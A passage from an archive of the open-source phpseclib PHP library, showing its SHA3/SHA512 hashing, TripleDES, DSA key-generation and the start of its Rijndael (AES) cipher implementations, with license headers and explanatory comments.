$block_size); foreach ($p as $pi) { $pi = unpack('P*', $pi); $x = $y = 0; foreach ($pi as $subpi) { $s[$x][$y++] ^= $subpi; if ($y == 5) { $y = 0; $x++; } } static::processSHA3Block64($s); } $z = ''; $i = $j = 0; while (strlen($z) < $d) { $z .= pack('P', $s[$i][$j++]); if ($j == 5) { $j = 0; $i++; if ($i == 5) { $i = 0; static::processSHA3Block64($s); } } } return $z; } /** * 64-bit block processing method for SHA3 * * @param array $s */ private static function processSHA3Block64(&$s) { static $rotationOffsets = [ [ 0, 1, 62, 28, 27], [36, 44, 6, 55, 20], [ 3, 10, 43, 25, 39], [41, 45, 15, 21, 8], [18, 2, 61, 56, 14] ]; static $roundConstants = [ 1, 32898, -9223372036854742902, -9223372034707259392, 32907, 2147483649, -9223372034707259263, -9223372036854743031, 138, 136, 2147516425, 2147483658, 2147516555, -9223372036854775669, -9223372036854742903, -9223372036854743037, -9223372036854743038, -9223372036854775680, 32778, -9223372034707292150, -9223372034707259263, -9223372036854742912, 2147483649, -9223372034707259384 ]; for ($round = 0; $round < 24; $round++) { // theta step $parity = []; for ($i = 0; $i < 5; $i++) { $parity[] = $s[0][$i] ^ $s[1][$i] ^ $s[2][$i] ^ $s[3][$i] ^ $s[4][$i]; } $temp = [ $parity[4] ^ static::rotateLeft64($parity[1], 1), $parity[0] ^ static::rotateLeft64($parity[2], 1), $parity[1] ^ static::rotateLeft64($parity[3], 1), $parity[2] ^ static::rotateLeft64($parity[4], 1), $parity[3] ^ static::rotateLeft64($parity[0], 1) ]; for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $s[$i][$j] ^= $temp[$j]; } } $st = $s; // rho and pi steps for ($i = 0; $i < 5; $i++) { for ($j = 0; $j < 5; $j++) { $st[(2 * $i + 3 * $j) % 5][$j] = static::rotateLeft64($s[$j][$i], $rotationOffsets[$j][$i]); } } // chi step for ($i = 0; $i < 5; $i++) { $s[$i] = [ $st[$i][0] ^ (~$st[$i][1] & $st[$i][2]), $st[$i][1] ^ (~$st[$i][2] & $st[$i][3]), $st[$i][2] ^ (~$st[$i][3] & $st[$i][4]), $st[$i][3] ^ (~$st[$i][4] & $st[$i][0]), $st[$i][4] ^ (~$st[$i][0] & $st[$i][1]) ]; } // iota step $s[0][0] ^= $roundConstants[$round]; } } /** * Rotate 64-bit int * * @param int $x * @param int $shift */ private static function rotateLeft64($x, $shift) { return ($x << $shift) | (($x >> (64 - $shift)) & ((1 << $shift) - 1)); } /** * Pure-PHP implementation of SHA512 * * @param string $m * @param array $hash * @return string */ private static function sha512($m, $hash) { static $k; if (!isset($k)) { // Initialize table of round constants // (first 64 bits of the fractional parts of the cube roots of the first 80 primes 2..409) $k = [ '428a2f98d728ae22', '7137449123ef65cd', 'b5c0fbcfec4d3b2f', 'e9b5dba58189dbbc', '3956c25bf348b538', '59f111f1b605d019', '923f82a4af194f9b', 'ab1c5ed5da6d8118', 'd807aa98a3030242', '12835b0145706fbe', '243185be4ee4b28c', '550c7dc3d5ffb4e2', '72be5d74f27b896f', '80deb1fe3b1696b1', '9bdc06a725c71235', 'c19bf174cf692694', 'e49b69c19ef14ad2', 'efbe4786384f25e3', '0fc19dc68b8cd5b5', '240ca1cc77ac9c65', '2de92c6f592b0275', '4a7484aa6ea6e483', '5cb0a9dcbd41fbd4', '76f988da831153b5', '983e5152ee66dfab', 'a831c66d2db43210', 'b00327c898fb213f', 'bf597fc7beef0ee4', 'c6e00bf33da88fc2', 'd5a79147930aa725', '06ca6351e003826f', '142929670a0e6e70', '27b70a8546d22ffc', '2e1b21385c26c926', '4d2c6dfc5ac42aed', '53380d139d95b3df', '650a73548baf63de', '766a0abb3c77b2a8', '81c2c92e47edaee6', '92722c851482353b', 'a2bfe8a14cf10364', 'a81a664bbc423001', 'c24b8b70d0f89791', 'c76c51a30654be30', 'd192e819d6ef5218', 'd69906245565a910', 'f40e35855771202a', '106aa07032bbd1b8', '19a4c116b8d2d0c8', '1e376c085141ab53', '2748774cdf8eeb99', '34b0bcb5e19b48a8', '391c0cb3c5c95a63', '4ed8aa4ae3418acb', '5b9cca4f7763e373', '682e6ff3d6b2b8a3', '748f82ee5defb2fc', '78a5636f43172f60', '84c87814a1f0ab72', '8cc702081a6439ec', '90befffa23631e28', 'a4506cebde82bde9', 'bef9a3f7b2c67915', 'c67178f2e372532b', 'ca273eceea26619c', 'd186b8c721c0c207', 'eada7dd6cde0eb1e', 'f57d4f7fee6ed178', '06f067aa72176fba', '0a637dc5a2c898a6', '113f9804bef90dae', '1b710b35131c471b', '28db77f523047d84', '32caab7b40c72493', '3c9ebe0a15c9bebc', '431d67c49c100d4c', '4cc5d4becb3e42b6', '597f299cfc657e2a', '5fcb6fab3ad6faec', '6c44198c4a475817' ]; for ($i = 0; $i < 80; $i++) { $k[$i] = new BigInteger($k[$i], 16); } } // Pre-processing $length = strlen($m); // to round to nearest 112 mod 128, we'll add 128 - (length + (128 - 112)) % 128 $m .= str_repeat(chr(0), 128 - (($length + 16) & 0x7F)); $m[$length] = chr(0x80); // we don't support hashing strings 512MB long $m .= pack('N4', 0, 0, 0, $length << 3); // Process the message in successive 1024-bit chunks $chunks = str_split($m, 128); foreach ($chunks as $chunk) { $w = []; for ($i = 0; $i < 16; $i++) { $temp = new BigInteger(Strings::shift($chunk, 8), 256); $temp->setPrecision(64); $w[] = $temp; } // Extend the sixteen 32-bit words into eighty 32-bit words for ($i = 16; $i < 80; $i++) { $temp = [ $w[$i - 15]->bitwise_rightRotate(1), $w[$i - 15]->bitwise_rightRotate(8), $w[$i - 15]->bitwise_rightShift(7) ]; $s0 = $temp[0]->bitwise_xor($temp[1]); $s0 = $s0->bitwise_xor($temp[2]); $temp = [ $w[$i - 2]->bitwise_rightRotate(19), $w[$i - 2]->bitwise_rightRotate(61), $w[$i - 2]->bitwise_rightShift(6) ]; $s1 = $temp[0]->bitwise_xor($temp[1]); $s1 = $s1->bitwise_xor($temp[2]); $w[$i] = clone $w[$i - 16]; $w[$i] = $w[$i]->add($s0); $w[$i] = $w[$i]->add($w[$i - 7]); $w[$i] = $w[$i]->add($s1); } // Initialize hash value for this chunk $a = clone $hash[0]; $b = clone $hash[1]; $c = clone $hash[2]; $d = clone $hash[3]; $e = clone $hash[4]; $f = clone $hash[5]; $g = clone $hash[6]; $h = clone $hash[7]; // Main loop for ($i = 0; $i < 80; $i++) { $temp = [ $a->bitwise_rightRotate(28), $a->bitwise_rightRotate(34), $a->bitwise_rightRotate(39) ]; $s0 = $temp[0]->bitwise_xor($temp[1]); $s0 = $s0->bitwise_xor($temp[2]); $temp = [ $a->bitwise_and($b), $a->bitwise_and($c), $b->bitwise_and($c) ]; $maj = $temp[0]->bitwise_xor($temp[1]); $maj = $maj->bitwise_xor($temp[2]); $t2 = $s0->add($maj); $temp = [ $e->bitwise_rightRotate(14), $e->bitwise_rightRotate(18), $e->bitwise_rightRotate(41) ]; $s1 = $temp[0]->bitwise_xor($temp[1]); $s1 = $s1->bitwise_xor($temp[2]); $temp = [ $e->bitwise_and($f), $g->bitwise_and($e->bitwise_not()) ]; $ch = $temp[0]->bitwise_xor($temp[1]); $t1 = $h->add($s1); $t1 = $t1->add($ch); $t1 = $t1->add($k[$i]); $t1 = $t1->add($w[$i]); $h = clone $g; $g = clone $f; $f = clone $e; $e = $d->add($t1); $d = clone $c; $c = clone $b; $b = clone $a; $a = $t1->add($t2); } // Add this chunk's hash to result so far $hash = [ $hash[0]->add($a), $hash[1]->add($b), $hash[2]->add($c), $hash[3]->add($d), $hash[4]->add($e), $hash[5]->add($f), $hash[6]->add($g), $hash[7]->add($h) ]; } // Produce the final hash value (big-endian) // (\phpseclib3\Crypt\Hash::hash() trims the output for hashes but not for HMACs. as such, we trim the output here) $temp = $hash[0]->toBytes() . $hash[1]->toBytes() . $hash[2]->toBytes() . $hash[3]->toBytes() . $hash[4]->toBytes() . $hash[5]->toBytes() . $hash[6]->toBytes() . $hash[7]->toBytes(); return $temp; } /** * __toString() magic method */ public function __toString() { return $this->getHash(); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/TripleDES.php000064400000032312147600400120021357 0ustar00 * setKey('abcdefghijklmnopqrstuvwx'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $des->decrypt($des->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; /** * Pure-PHP implementation of Triple DES. * * @author Jim Wigginton */ class TripleDES extends DES { /** * Encrypt / decrypt using inner chaining * * Inner chaining is used by SSH-1 and is generally considered to be less secure then outer chaining (self::MODE_CBC3). */ const MODE_3CBC = -2; /** * Encrypt / decrypt using outer chaining * * Outer chaining is used by SSH-2 and when the mode is set to \phpseclib3\Crypt\Common\BlockCipher::MODE_CBC. */ const MODE_CBC3 = self::MODE_CBC; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\TripleDES::setKeyLength() * @var int */ protected $key_length = 24; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\DES::cipher_name_mcrypt * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'tripledes'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 750; /** * max possible size of $key * * @see self::setKey() * @see \phpseclib3\Crypt\DES::setKey() * @var string */ protected $key_length_max = 24; /** * Internal flag whether using self::MODE_3CBC or not * * @var bool */ private $mode_3cbc; /** * The \phpseclib3\Crypt\DES objects * * Used only if $mode_3cbc === true * * @var array */ private $des; /** * Default Constructor. * * Determines whether or not the mcrypt or OpenSSL extensions should be used. * * $mode could be: * * - ecb * * - cbc * * - ctr * * - cfb * * - ofb * * - 3cbc * * - cbc3 (same as cbc) * * @see \phpseclib3\Crypt\DES::__construct() * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param string $mode */ public function __construct($mode) { switch (strtolower($mode)) { // In case of self::MODE_3CBC, we init as CRYPT_DES_MODE_CBC // and additional flag us internally as 3CBC case '3cbc': parent::__construct('cbc'); $this->mode_3cbc = true; // This three $des'es will do the 3CBC work (if $key > 64bits) $this->des = [ new DES('cbc'), new DES('cbc'), new DES('cbc'), ]; // we're going to be doing the padding, ourselves, so disable it in the \phpseclib3\Crypt\DES objects $this->des[0]->disablePadding(); $this->des[1]->disablePadding(); $this->des[2]->disablePadding(); break; case 'cbc3': $mode = 'cbc'; // fall-through // If not 3CBC, we init as usual default: parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new BadModeException('Block ciphers cannot be ran in stream mode'); } } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { $this->cipher_name_openssl_ecb = 'des-ede3'; $mode = $this->openssl_translate_mode(); $this->cipher_name_openssl = $mode == 'ecb' ? 'des-ede3' : 'des-ede3-' . $mode; } return parent::isValidEngineHelper($engine); } /** * Sets the initialization vector. * * SetIV is not required when \phpseclib3\Crypt\Common\SymmetricKey::MODE_ECB is being used. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setIV() * @param string $iv */ public function setIV($iv) { parent::setIV($iv); if ($this->mode_3cbc) { $this->des[0]->setIV($iv); $this->des[1]->setIV($iv); $this->des[2]->setIV($iv); } } /** * Sets the key length. * * Valid key lengths are 128 and 192 bits. * * If you want to use a 64-bit key use DES.php * * @see \phpseclib3\Crypt\Common\SymmetricKey:setKeyLength() * @throws \LengthException if the key length is invalid * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 192: break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128 or 192 bits are supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Triple DES can use 128-bit (eg. strlen($key) == 16) or 192-bit (eg. strlen($key) == 24) keys. * * DES also requires that every eighth bit be a parity bit, however, we'll ignore that. * * @see \phpseclib3\Crypt\DES::setKey() * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @throws \LengthException if the key length is invalid * @param string $key */ public function setKey($key) { if ($this->explicit_key_length !== false && strlen($key) != $this->explicit_key_length) { throw new \LengthException('Key length has already been set to ' . $this->explicit_key_length . ' bytes and this key is ' . strlen($key) . ' bytes'); } switch (strlen($key)) { case 16: $key .= substr($key, 0, 8); break; case 24: break; default: throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes 16 or 24 are supported'); } // copied from self::setKey() $this->key = $key; $this->key_length = strlen($key); $this->changed = $this->nonIVChanged = true; $this->setEngine(); if ($this->mode_3cbc) { $this->des[0]->setKey(substr($key, 0, 8)); $this->des[1]->setKey(substr($key, 8, 8)); $this->des[2]->setKey(substr($key, 16, 8)); } } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @param string $plaintext * @return string $cipertext */ public function encrypt($plaintext) { // parent::en/decrypt() is able to do all the work for all modes and keylengths, // except for: self::MODE_3CBC (inner chaining CBC) with a key > 64bits // if the key is smaller then 8, do what we'd normally do if ($this->mode_3cbc && strlen($this->key) > 8) { return $this->des[2]->encrypt( $this->des[1]->decrypt( $this->des[0]->encrypt( $this->pad($plaintext) ) ) ); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->mode_3cbc && strlen($this->key) > 8) { return $this->unpad( $this->des[0]->decrypt( $this->des[1]->encrypt( $this->des[2]->decrypt( str_pad($ciphertext, (strlen($ciphertext) + 7) & 0xFFFFFFF8, "\0") ) ) ) ); } return parent::decrypt($ciphertext); } /** * Treat consecutive "packets" as if they are a continuous buffer. * * Say you have a 16-byte plaintext $plaintext. Using the default behavior, the two following code snippets * will yield different outputs: * * * echo $des->encrypt(substr($plaintext, 0, 8)); * echo $des->encrypt(substr($plaintext, 8, 8)); * * * echo $des->encrypt($plaintext); * * * The solution is to enable the continuous buffer. Although this will resolve the above discrepancy, it creates * another, as demonstrated with the following: * * * $des->encrypt(substr($plaintext, 0, 8)); * echo $des->decrypt($des->encrypt(substr($plaintext, 8, 8))); * * * echo $des->decrypt($des->encrypt(substr($plaintext, 8, 8))); * * * With the continuous buffer disabled, these would yield the same output. With it enabled, they yield different * outputs. The reason is due to the fact that the initialization vector's change after every encryption / * decryption round when the continuous buffer is enabled. When it's disabled, they remain constant. * * Put another way, when the continuous buffer is enabled, the state of the \phpseclib3\Crypt\DES() object changes after each * encryption / decryption round, whereas otherwise, it'd remain constant. For this reason, it's recommended that * continuous buffers not be used. They do offer better security and are, in fact, sometimes required (SSH uses them), * however, they are also less intuitive and more likely to cause you problems. * * @see \phpseclib3\Crypt\Common\SymmetricKey::enableContinuousBuffer() * @see self::disableContinuousBuffer() */ public function enableContinuousBuffer() { parent::enableContinuousBuffer(); if ($this->mode_3cbc) { $this->des[0]->enableContinuousBuffer(); $this->des[1]->enableContinuousBuffer(); $this->des[2]->enableContinuousBuffer(); } } /** * Treat consecutive packets as if they are a discontinuous buffer. * * The default behavior. * * @see \phpseclib3\Crypt\Common\SymmetricKey::disableContinuousBuffer() * @see self::enableContinuousBuffer() */ public function disableContinuousBuffer() { parent::disableContinuousBuffer(); if ($this->mode_3cbc) { $this->des[0]->disableContinuousBuffer(); $this->des[1]->disableContinuousBuffer(); $this->des[2]->disableContinuousBuffer(); } } /** * Creates the key schedule * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { switch (true) { // if $key <= 64bits we configure our internal pure-php cipher engine // to act as regular [1]DES, not as 3DES. mcrypt.so::tripledes does the same. case strlen($this->key) <= 8: $this->des_rounds = 1; break; // otherwise, if $key > 64bits, we configure our engine to work as 3DES. default: $this->des_rounds = 3; // (only) if 3CBC is used we have, of course, to setup the $des[0-2] keys also separately. if ($this->mode_3cbc) { $this->des[0]->setupKey(); $this->des[1]->setupKey(); $this->des[2]->setupKey(); // because $des[0-2] will, now, do all the work we can return here // not need unnecessary stress parent::setupKey() with our, now unused, $key. return; } } // setup our key parent::setupKey(); } /** * Sets the internal crypt engine * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @see \phpseclib3\Crypt\Common\SymmetricKey::setPreferredEngine() * @param int $engine */ public function setPreferredEngine($engine) { if ($this->mode_3cbc) { $this->des[0]->setPreferredEngine($engine); $this->des[1]->setPreferredEngine($engine); $this->des[2]->setPreferredEngine($engine); } parent::setPreferredEngine($engine); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA.php000064400000022205147600400120020173 0ustar00 * getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * * * @author Jim Wigginton * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\AsymmetricKey; use phpseclib3\Crypt\DSA\Parameters; use phpseclib3\Crypt\DSA\PrivateKey; use phpseclib3\Crypt\DSA\PublicKey; use phpseclib3\Exception\InsufficientSetupException; use phpseclib3\Math\BigInteger; /** * Pure-PHP FIPS 186-4 compliant implementation of DSA. * * @author Jim Wigginton */ abstract class DSA extends AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'DSA'; /** * DSA Prime P * * @var \phpseclib3\Math\BigInteger */ protected $p; /** * DSA Group Order q * * Prime divisor of p-1 * * @var \phpseclib3\Math\BigInteger */ protected $q; /** * DSA Group Generator G * * @var \phpseclib3\Math\BigInteger */ protected $g; /** * DSA public key value y * * @var \phpseclib3\Math\BigInteger */ protected $y; /** * Signature Format * * @var string */ protected $sigFormat; /** * Signature Format (Short) * * @var string */ protected $shortFormat; /** * Create DSA parameters * * @param int $L * @param int $N * @return \phpseclib3\Crypt\DSA|bool */ public static function createParameters($L = 2048, $N = 224) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createParameters() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } switch (true) { case $N == 160: /* in FIPS 186-1 and 186-2 N was fixed at 160 whereas K had an upper bound of 1024. RFC 4253 (SSH Transport Layer Protocol) references FIPS 186-2 and as such most SSH DSA implementations only support keys with an N of 160. puttygen let's you set the size of L (but not the size of N) and uses 2048 as the default L value. that's not really compliant with any of the FIPS standards, however, for the purposes of maintaining compatibility with puttygen, we'll support it */ //case ($L >= 512 || $L <= 1024) && (($L & 0x3F) == 0) && $N == 160: // FIPS 186-3 changed this as follows: //case $L == 1024 && $N == 160: case $L == 2048 && $N == 224: case $L == 2048 && $N == 256: case $L == 3072 && $N == 256: break; default: throw new \InvalidArgumentException('Invalid values for N and L'); } $two = new BigInteger(2); $q = BigInteger::randomPrime($N); $divisor = $q->multiply($two); do { $x = BigInteger::random($L); list(, $c) = $x->divide($divisor); $p = $x->subtract($c->subtract(self::$one)); } while ($p->getLength() != $L || !$p->isPrime()); $p_1 = $p->subtract(self::$one); list($e) = $p_1->divide($q); // quoting http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf#page=50 , // "h could be obtained from a random number generator or from a counter that // changes after each use". PuTTY (sshdssg.c) starts h off at 1 and increments // it on each loop. wikipedia says "commonly h = 2 is used" so we'll just do that $h = clone $two; while (true) { $g = $h->powMod($e, $p); if (!$g->equals(self::$one)) { break; } $h = $h->add(self::$one); } $dsa = new Parameters(); $dsa->p = $p; $dsa->q = $q; $dsa->g = $g; return $dsa; } /** * Create public / private key pair. * * This method is a bit polymorphic. It can take a DSA/Parameters object, L / N as two distinct parameters or * no parameters (at which point L and N will be generated with this method) * * Returns the private key, from which the publickey can be extracted * * @param int[] ...$args * @return DSA\PrivateKey */ public static function createKey(...$args) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (count($args) == 2 && is_int($args[0]) && is_int($args[1])) { $params = self::createParameters($args[0], $args[1]); } elseif (count($args) == 1 && $args[0] instanceof Parameters) { $params = $args[0]; } elseif (!count($args)) { $params = self::createParameters(); } else { throw new InsufficientSetupException('Valid parameters are either two integers (L and N), a single DSA object or no parameters at all.'); } $private = new PrivateKey(); $private->p = $params->p; $private->q = $params->q; $private->g = $params->g; $private->x = BigInteger::randomRange(self::$one, $private->q->subtract(self::$one)); $private->y = $private->g->powMod($private->x, $private->p); //$public = clone $private; //unset($public->x); return $private ->withHash($params->hash->getHash()) ->withSignatureFormat($params->shortFormat); } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (!isset($components['x']) && !isset($components['y'])) { $new = new Parameters(); } elseif (isset($components['x'])) { $new = new PrivateKey(); $new->x = $components['x']; } else { $new = new PublicKey(); } $new->p = $components['p']; $new->q = $components['q']; $new->g = $components['g']; if (isset($components['y'])) { $new->y = $components['y']; } return $new; } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { $this->sigFormat = self::validatePlugin('Signature', 'ASN1'); $this->shortFormat = 'ASN1'; parent::__construct(); } /** * Returns the key size * * More specifically, this L (the length of DSA Prime P) and N (the length of DSA Group Order q) * * @return array */ public function getLength() { return ['L' => $this->p->getLength(), 'N' => $this->q->getLength()]; } /** * Returns the current engine being used * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } return self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods()) ? 'OpenSSL' : 'PHP'; } /** * Returns the parameters * * A public / private key is only returned if the currently loaded "key" contains an x or y * value. * * @see self::getPublicKey() * @return mixed */ public function getParameters() { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); $key = $type::saveParameters($this->p, $this->q, $this->g); return DSA::load($key, 'PKCS1') ->withHash($this->hash->getHash()) ->withSignatureFormat($this->shortFormat); } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { $new = clone $this; $new->shortFormat = $format; $new->sigFormat = self::validatePlugin('Signature', $format); return $new; } /** * Returns the signature format currently being used * */ public function getSignatureFormat() { return $this->shortFormat; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Rijndael.php000064400000126111147600400120021315 0ustar00 * setKey('abcdefghijklmnop'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $rijndael->decrypt($rijndael->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @copyright 2008 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\BlockCipher; use phpseclib3\Exception\BadDecryptionException; use phpseclib3\Exception\BadModeException; use phpseclib3\Exception\InconsistentSetupException; use phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of Rijndael. * * @author Jim Wigginton */ class Rijndael extends BlockCipher { /** * The mcrypt specific name of the cipher * * Mcrypt is useable for 128/192/256-bit $block_size/$key_length. For 160/224 not. * \phpseclib3\Crypt\Rijndael determines automatically whether mcrypt is useable * or not for the current $block_size/$key_length. * In case of, $cipher_name_mcrypt will be set dynamically at run time accordingly. * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @see \phpseclib3\Crypt\Common\SymmetricKey::engine * @see self::isValidEngine() * @var string */ protected $cipher_name_mcrypt = 'rijndael-128'; /** * The Key Schedule * * @see self::setup() * @var array */ private $w; /** * The Inverse Key Schedule * * @see self::setup() * @var array */ private $dw; /** * The Block Length divided by 32 * * {@internal The max value is 256 / 32 = 8, the min value is 128 / 32 = 4. Exists in conjunction with $block_size * because the encryption / decryption / key schedule creation requires this number and not $block_size. We could * derive this from $block_size or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see self::setBlockLength() * @var int */ private $Nb = 4; /** * The Key Length (in bytes) * * {@internal The max value is 256 / 8 = 32, the min value is 128 / 8 = 16. Exists in conjunction with $Nk * because the encryption / decryption / key schedule creation requires this number and not $key_length. We could * derive this from $key_length or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see self::setKeyLength() * @var int */ protected $key_length = 16; /** * The Key Length divided by 32 * * @see self::setKeyLength() * @var int * @internal The max value is 256 / 32 = 8, the min value is 128 / 32 = 4 */ private $Nk = 4; /** * The Number of Rounds * * {@internal The max value is 14, the min value is 10.} * * @var int */ private $Nr; /** * Shift offsets * * @var array */ private $c; /** * Holds the last used key- and block_size information * * @var array */ private $kl; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Sets the key length. * * Valid key lengths are 128, 160, 192, 224, and 256. * * Note: phpseclib extends Rijndael (and AES) for using 160- and 224-bit keys but they are officially not defined * and the most (if not all) implementations are not able using 160/224-bit keys but round/pad them up to * 192/256 bits as, for example, mcrypt will do. * * That said, if you want be compatible with other Rijndael and AES implementations, * you should not setKeyLength(160) or setKeyLength(224). * * Additional: In case of 160- and 224-bit keys, phpseclib will/can, for that reason, not use * the mcrypt php extension, even if available. * This results then in slower encryption. * * @throws \LengthException if the key length is invalid * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 160: case 192: case 224: case 256: $this->key_length = $length >> 3; break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128, 160, 192, 224 or 256 bits are supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths * * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (strlen($key)) { case 16: case 20: case 24: case 28: case 32: break; default: throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 20, 24, 28 or 32 are supported'); } parent::setKey($key); } /** * Sets the block length * * Valid block lengths are 128, 160, 192, 224, and 256. * * @param int $length */ public function setBlockLength($length) { switch ($length) { case 128: case 160: case 192: case 224: case 256: break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128, 160, 192, 224 or 256 bits are supported'); } $this->Nb = $length >> 5; $this->block_size = $length >> 3; $this->changed = $this->nonIVChanged = true; $this->setEngine(); } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_LIBSODIUM: return function_exists('sodium_crypto_aead_aes256gcm_is_available') && sodium_crypto_aead_aes256gcm_is_available() && $this->mode == self::MODE_GCM && $this->key_length == 32 && $this->nonce && strlen($this->nonce) == 12 && $this->block_size == 16; case self::ENGINE_OPENSSL_GCM: if (!extension_loaded('openssl')) { return false; } $methods = openssl_get_cipher_methods(); return $this->mode == self::MODE_GCM && version_compare(PHP_VERSION, '7.1.0', '>=') && in_array('aes-' . $this->getKeyLength() . '-gcm', $methods) && $this->block_size == 16; case self::ENGINE_OPENSSL: if ($this->block_size != 16) { return false; } $this->cipher_name_openssl_ecb = 'aes-' . ($this->key_length << 3) . '-ecb'; $this->cipher_name_openssl = 'aes-' . ($this->key_length << 3) . '-' . $this->openssl_translate_mode(); break; case self::ENGINE_MCRYPT: $this->cipher_name_mcrypt = 'rijndael-' . ($this->block_size << 3); if ($this->key_length % 8) { // is it a 160/224-bit key? // mcrypt is not usable for them, only for 128/192/256-bit keys return false; } } return parent::isValidEngineHelper($engine); } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { static $tables; if (empty($tables)) { $tables = &$this->getTables(); } $t0 = $tables[0]; $t1 = $tables[1]; $t2 = $tables[2]; $t3 = $tables[3]; $sbox = $tables[4]; $state = []; $words = unpack('N*', $in); $c = $this->c; $w = $this->w; $Nb = $this->Nb; $Nr = $this->Nr; // addRoundKey $wc = $Nb - 1; foreach ($words as $word) { $state[] = $word ^ $w[++$wc]; } // fips-197.pdf#page=19, "Figure 5. Pseudo Code for the Cipher", states that this loop has four components - // subBytes, shiftRows, mixColumns, and addRoundKey. fips-197.pdf#page=30, "Implementation Suggestions Regarding // Various Platforms" suggests that performs enhanced implementations are described in Rijndael-ammended.pdf. // Rijndael-ammended.pdf#page=20, "Implementation aspects / 32-bit processor", discusses such an optimization. // Unfortunately, the description given there is not quite correct. Per aes.spec.v316.pdf#page=19 [1], // equation (7.4.7) is supposed to use addition instead of subtraction, so we'll do that here, as well. // [1] http://fp.gladman.plus.com/cryptography_technology/rijndael/aes.spec.v316.pdf $temp = []; for ($round = 1; $round < $Nr; ++$round) { $i = 0; // $c[0] == 0 $j = $c[1]; $k = 